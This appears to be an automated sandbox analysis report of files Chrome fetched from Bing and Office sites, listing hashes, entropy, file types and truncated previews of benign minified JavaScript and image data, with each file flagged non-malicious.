                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1699 x 1181, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):793073
                                                                                                    Entropy (8bit):7.9926326015445595
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:zzR6wui4acRTYbntjQHv/6/nIz78wWDgqzMv0RxvAL+YopRvJl9JsG4VF5Rq5:zzRe+cRTY7+HKKASMRO+X3RJsGeg
                                                                                                    MD5:979FF0DCE1EDA2035552AD1AA4EFACFA
                                                                                                    SHA1:5765B464F4C94028C4D7492159E2B584DDE8E357
                                                                                                    SHA-256:5979E07897CC0115AC1F320D880B419BF59185B8E6C7BCC75011784E90EA1FEF
                                                                                                    SHA-512:623737D9A6493C87C6EE0765A8880AB3E1C1A67E674C3B4AA908049DE34CBC3D1A899BA1B6C644B881490453DD9067953F3AD00E5E335F872E5CB1AE30EEC244
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-5-mreb-979ff0dce1.png
                                                                                                    Preview:.PNG........IHDR...............&.....pHYs.................sRGB.........gAMA......a.....IDATx...Y.ui~..k.............l..H....K.`.T...!..Yv.... .$... ... 7....A`...A,..e....bsR.U.Mg..Z+..<.w.]...Uu.2).......^k....L..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):242
                                                                                                    Entropy (8bit):4.86807996961474
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                    MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                    SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                    SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                    SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1236), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1236
                                                                                                    Entropy (8bit):5.274615406899761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:L3xRWZmoIQpaszpBXsbeKdAfilMso6zWevpoZQXulBuhL5xcMBJslvqsHAD9OW95:dwOjszXXsb9dALso6CeieXTuqslvqsgF
                                                                                                    MD5:2AB5F586948224AB662FBF84A5AA14D4
                                                                                                    SHA1:0DEA7AD6D167A668DAC5223770C1181617212FD0
                                                                                                    SHA-256:3CC647A2969085CFE0E526FC7F460AA5443057FD4D257C34E0BC099EE1F5492A
                                                                                                    SHA-512:02A7D528F3A97345300F63909DDCE8B0E73B5E7D3F4E3F4717EE6B3B8B1D75FD244AB9B132A04D4575E18F848117D8C667105CB0136E9C8E671B0068490A3779
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var AppSearchAjaxLoader;(function(n){function i(n){var i=n.getElementsByTagName("script"),t,u;if(i)for(t=0;t<i.length;t++)u=i[t],r(u)}function r(n){if(n){var t=sj_ce("script","");t.type="text/javascript";n.src?t.src=n.src:t.innerHTML=n.innerHTML;u(t)}}function u(n){_d.head.appendChild(n)}var t=function(){function n(n,t,i,r,u){this.failStr=n;this.logEvent=t;this.errClsName=i;this.loadClsName=r;this.successClsName=u}return n.prototype.loadAjaxData=function(n,t,r,u){var e=this,s,o,f;u===void 0&&(u=null);t&&(s=n.id+"_dynamic",o=sj_ce("div",s,this.loadClsName),n.innerHTML="",n.appendChild(o),f=sj_gx(),r||(r=""),t+=(t.indexOf("?")!=-1?"&":"?")+"IID="+r+"&IG="+_G.IG,f.open("GET",t,!0),sb_st(function(){f&&f.abort()},1e4),f.onreadystatechange=function(){var n;if(f!==null&&4===f.readyState){var r=f.status,t=f.responseText,s=!f.getAllResponseHeaders();if(f=null,n=200===r&&t!==null&&t!=="",o.className=n?e.successClsName:e.errClsName,o.innerHTML=n?t:e.failStr,n){n=!1;try{t&&(i(o),_w.rms&&_w.rms.sta
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1274
                                                                                                    Entropy (8bit):5.30620342636407
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                                                    MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                                                    SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                                                    SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                                                    SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1143 x 794, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):383270
                                                                                                    Entropy (8bit):7.988693191327277
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:TPRLLUNp5X4PgHMt6rH4wJKdPUQ8hR8YXR+JQKFTRvMqtpKyg9N/hTWjrA3S1SmI:hYNTIP/wJuMQ8hR8YXR+JQK3gz/JGA3t
                                                                                                    MD5:7B89E7B9A1E5F0E2AD529D5A85E1ACB7
                                                                                                    SHA1:304ECC4375129D905E70AFE830E998470DADECD9
                                                                                                    SHA-256:1329D493F7D313CA0026EB2664D1AACECBCA82D5BE70F692DD61C980F3BB16BE
                                                                                                    SHA-512:F35C28AC263F1C8A16385D6624D33D0EBCA72F0F959DA654C5B552D5B23EDF41A16D922A9FB6AAFD408AF7E2721D42C0145D99E6B8BC462679FADBEF2C484BA4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...w..........b......pHYs.........&.:4....sRGB.........gAMA......a....IDATx...{.o.U....~.q.>.z.....*W...1.1...$.N...L...%...*.)..{...J]....i!.-uh!ZJB......4j.....@$l.:..7.....5z.5.s......~.:...~.S..[k..Zk....5.D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1347
                                                                                                    Entropy (8bit):7.4697680144409695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Zlfwfjp+BNJW9N5ooKufc+jJ51QPPGePW8LXEVZUceu9hs2lFHwy79MCTk:ZFwfM5Wp1fcszerN2lT/o
                                                                                                    MD5:7060EF2B0C1139C0A5220EDA2CD59E24
                                                                                                    SHA1:1D4429429DDFDB17A0DA65ECDEBFF83D1DFF5828
                                                                                                    SHA-256:EB23CFA6B86DFF86B7CDBD6525A894D93D3D9F6485D7E0D36EABA9F8B551044B
                                                                                                    SHA-512:15C52AFC342EC05B9AFEC31493F38753788AC1BB9C4F002EFA998CF964184C692D79A48456DEBDDF83C7DE899233885F783847CFD1940091784686B4CF0C75E3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."................................................L...Th...>.....z.l_.[..=.J.=.:....2..z.JzWM.....=.#.............................................%......y.w...1.|....?...........................!1"AQRc#b.... T..23BC....DSdq.............?.....t.V....n..n..n..n..n..n..n..n..^..j2....~&..=.*..\.j.;..!...Y{q],i..B.O*.o...v.=..$..qI..7lm..H`oU.....[..(:..'..pO..{y.e.OdG..R..<.X0$...2z...M`[u...d]%.\3..j....ca.......f.H.PhN..hl}7q...{...V..H.A..qH./..%p....F....t.?...GC.^.\..'B.H......n..[.|V...tmR)@m...s.r..[.A.3......J........e.....|r.X..9..I..X........JDm`.n.....NN0y..A.6.......?...so..j.\....@.?.....].^.{^<.........0..FF.<...+..!.!..&.`.Y:...SCk.`...........)8.>.eA....A\v...]...|........;j._....|.........q:...CPX+.....k.O.B.9...<+.O..S.T..<+.O.......3.HS...;{..!.aO....g.mm..-a.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):248
                                                                                                    Entropy (8bit):5.307345511997089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:JiMVBdgqZjzew5WDMER31seGnYjEVcRIOcpaOWAg6n:MMHdVBSgWDNbpjE6c6F6
                                                                                                    MD5:3CF80D9421E076DF8E65D422F2D6FEF1
                                                                                                    SHA1:43D36B259CC20CA7E1B89A7D8E2A05F374ECD567
                                                                                                    SHA-256:8B1DE3A3E8B4556D7026749CA82EE57B0CEA7CEF3F49488D3C130CC8B5101E44
                                                                                                    SHA-512:255393CC5083147B885A2A887AC66AC2B8D2088816BCE469185B390C06B04658F5417F50E31AB8D4C24E1A43069BAD9801DAC0CE02A5A32E6D5396B5AF06BC36
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://3pcookiecheck.azureedge.net/instrument/cookieenabled
                                                                                                    Preview:.<?xml version="1.0" encoding="utf-8"?><Error><Code>PublicAccessNotPermitted</Code><Message>Public access is not permitted on this storage account..RequestId:f8cd437b-401e-003c-0362-55581a000000.Time:2024-12-23T17:44:36.8278901Z</Message></Error>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (622), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):622
                                                                                                    Entropy (8bit):5.265947581512117
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:2QxhNgpOWEaaRHkj6iLUEkFKgsmqRRV6alt0Tk6iLUEkFkno:2QTepraRHk+i1kFKgsmqRRVZr8k6i1kh
                                                                                                    MD5:3104955279E1BBBDB4AE5A0E077C5A74
                                                                                                    SHA1:BA10A722FFF1877C3379DEE7B5F028D467FFD6CF
                                                                                                    SHA-256:A0A1CEE602080757FBADB2D23EAD2BBB8B0726B82FDB2ED654DA4403F1E78EF1
                                                                                                    SHA-512:6937ED6194E4842FF5B4878B0D680E02CAF3185BAF65EDC131260B56A87968B5D6C80F236C1DE1A059D8158BC93B80B831FE679F38FC06DFB7C3413D1D5355AA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function n(){var n=_ge("id_p"),t,r,i;n&&(t="",r="",n.dataset?(t=n.dataset.src,r=n.dataset.alt):(t=n.getAttribute("data-src"),r=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=r},n.src=t,i=_d.getElementById("bp_shortcut_img"),i&&(i.setAttribute("src",t),i.onerror=function(){i.setAttribute("src","data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=")})))}n()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7179)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):7180
                                                                                                    Entropy (8bit):5.161749091368312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HA1SI+LtL5XIr10Tjyf8J+Bz9NgR51fuPKZs7f/:g1SIiXhqabao6/
                                                                                                    MD5:8E28DB3A65522AE2012DE9ADCE4DE5BF
                                                                                                    SHA1:84EA63544DA64A2355256B0BAE973AE1EAE04CE6
                                                                                                    SHA-256:ADF7F9B0DD938575C72FF1592EA18E7AB9BC53FF8838A38C8484C10F5D9BE7FD
                                                                                                    SHA-512:4319C5B3C4B880ADE6E25B28609A14152389CC8D835AD213D58984153C3E7FF8718B2829A330A7EA4F2C11DB68C358438563FB301D9D6240BF833CEE1462756C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/hOpjVE2mSiNVJWsLrpc64ergTOY.js
                                                                                                    Preview:var webVitals=function(e){"use strict";var n,t,r,i,o,a=-1,c=function(e){addEventListener("pageshow",(function(n){n.persisted&&(a=n.timeStamp,e(n))}),!0)},u=function(){var e=self.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0];if(e&&e.responseStart>0&&e.responseStart<performance.now())return e},s=function(){var e=u();return e&&e.activationStart||0},f=function(e,n){var t=u(),r="navigate";a>=0?r="back-forward-cache":t&&(document.prerendering||s()>0?r="prerender":document.wasDiscarded?r="restore":t.type&&(r=t.type.replace(/_/g,"-")));return{name:e,value:void 0===n?-1:n,rating:"good",delta:0,entries:[],id:"v4-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},d=function(e,n,t){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var r=new PerformanceObserver((function(e){Promise.resolve().then((function(){n(e.getEntries())}))}));return r.observe(Object.assign({type:e,buffered:!0},t||{})),r}}catch(e
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (19806), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):19806
                                                                                                    Entropy (8bit):5.331074826853414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3WsjV9Npzk8fbw3QMXmwOAahGvyBJeXiOOF240eApyfYRxW+:3zVPpzkLXmw0onXi9F24Ypw43
                                                                                                    MD5:1CA891F499366C455EB94F8FFB96E86B
                                                                                                    SHA1:1F7236D20DE8985F624B610F51207E1F92F93A1A
                                                                                                    SHA-256:D80F772080A164CFC69E2B7947494B0FF23AF81D2CEDC06B492ED0A0149FBFF2
                                                                                                    SHA-512:17EDCE9121AC55B16515EDC8EA278307C2D0C1615EF5D54236FB8BAD0F853B85838D69EC063210938B83F9D2AE36AE73E88A12FD8F25022523B71C0F4251735B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/rp/H3I20g3omF9iS2EPUSB-H5L5Oho.js
                                                                                                    Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3363
                                                                                                    Entropy (8bit):5.195022922251816
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                    MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                    SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                    SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                    SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/zeCxMEtVi23nUD1VnJIBRkRzb4g.js
                                                                                                    Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1409 x 979, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1074513
                                                                                                    Entropy (8bit):7.992502130294777
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:Z5bdLk74D3xyaSraAjS7kyTxnkExgpDUPJ2NNu:ZHL9DhZSrbjSQy1mpQPJ2q
                                                                                                    MD5:86723A74CC0FCAD23D9BF25A8EC33CAC
                                                                                                    SHA1:24579C0CD153ED5B5856520E8B91FB2A61DEE8B3
                                                                                                    SHA-256:CC6DEB15D98EE0D2F63E0FB260700C6579394AB15BC09CBB4B11ED925F701EF7
                                                                                                    SHA-512:F2D60AC241146C08FF92AD548A111F5794321FBB04F70176D8187D38D89F7862D7F3D841DBA4C8138DA7C591897050040BC39EFE3CD4ACBFF1798ACF05E0AF82
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-4-mreb-86723a74cc.png
                                                                                                    Preview:.PNG........IHDR..............Y.s....pHYs.................sRGB.........gAMA......a...d.IDATx.....v.U...].....lM.$.-....6...6.%.....Mwg.t:C..I_CV.v.Y!.......C.p...1I....c06x.F.%.%..?}.{j.....v..~..K.e.....3T...N.S..g...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2169
                                                                                                    Entropy (8bit):5.302641155413102
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                    MD5:61533293909D97252C70E82BD574BA68
                                                                                                    SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                    SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                    SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 4000 x 2238, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):10058400
                                                                                                    Entropy (8bit):7.988307130589743
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:5nHCaQivyot0RWDNzjMqV8CoWF6UquVtmS7ycKUkQfaGG9:ZHCavyI0cDN0qV8rmguVwaKUffaGG9
                                                                                                    MD5:7D5C104D8439CC4A1A9618391A52DFC2
                                                                                                    SHA1:1EACDB703238FC270187A1A23AA77315EE475ED2
                                                                                                    SHA-256:2AB1510CDB2FA03A8CAF6F2CC4A40EBB2B8218922A6AD1F640F4EDD9018E9144
                                                                                                    SHA-512:73446F80AC5B2AB4DEE11CAE312D9486CDF1261DE7BB988F55A5C5269825773964857452705CA6B4B165DCA4DFFE7DD13531CA04804E61210DC950CED900C26F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/unauth-m365-hero-copilot-centric-7d5c104d84.png
                                                                                                    Preview:.PNG........IHDR................g....pHYs.................sRGB.........gAMA......a...z5IDATx.....&.&..J........;>..xt..{.....2.I...vu.....T.PJ.Z....K....Ep..16.r..+.........h9......5q.8.?.....0...|<Y@...y6..B..N./..yI....*e\.....d.MzN.X..V_.N..9..2.5.'A.-#...A4.._..S.|...u_.....J.gd.lR..........i.@y,.?.}[|..>.$p'..zi.#]emv%.!.cO...>.n8r..5..Ro.5.......h.....4.'...[....X....@[..U...v.?4D..4,;y>....r=..L...4\_p...r...~.,..<..r...3....!t._E....Ai....M3...'......z.hl#..j=...0.e;..F...9..9..._.....0..}..".k......`I.r...A...1....+.>.`.g...E..|...1.....!..3{=..s@.-1.....343u...)..Z.k..}u.c.....QG.xy.9;. ^...x..!.S....n..z....O.0.l........M..p?..{.o/...?-..?..,.2ur......[....].b.'C..V.&...e.w`..r..|o..;6.....k..9._.|.{{...'..O..7.g..zG.'.#...~...]....g.$.*.F........o..QI..ge{...8w.t.Z.'.:..!./.......x...:.1.s...'.......D....g.Q.*y.>>.-q... ......sH..........G........<H........S..y>.+......_'k...}........i.=e...kN'_I.:..~ZsY..t$o.C..&).0D...S.....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9310
                                                                                                    Entropy (8bit):7.907965931624856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                                                    MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                                                    SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
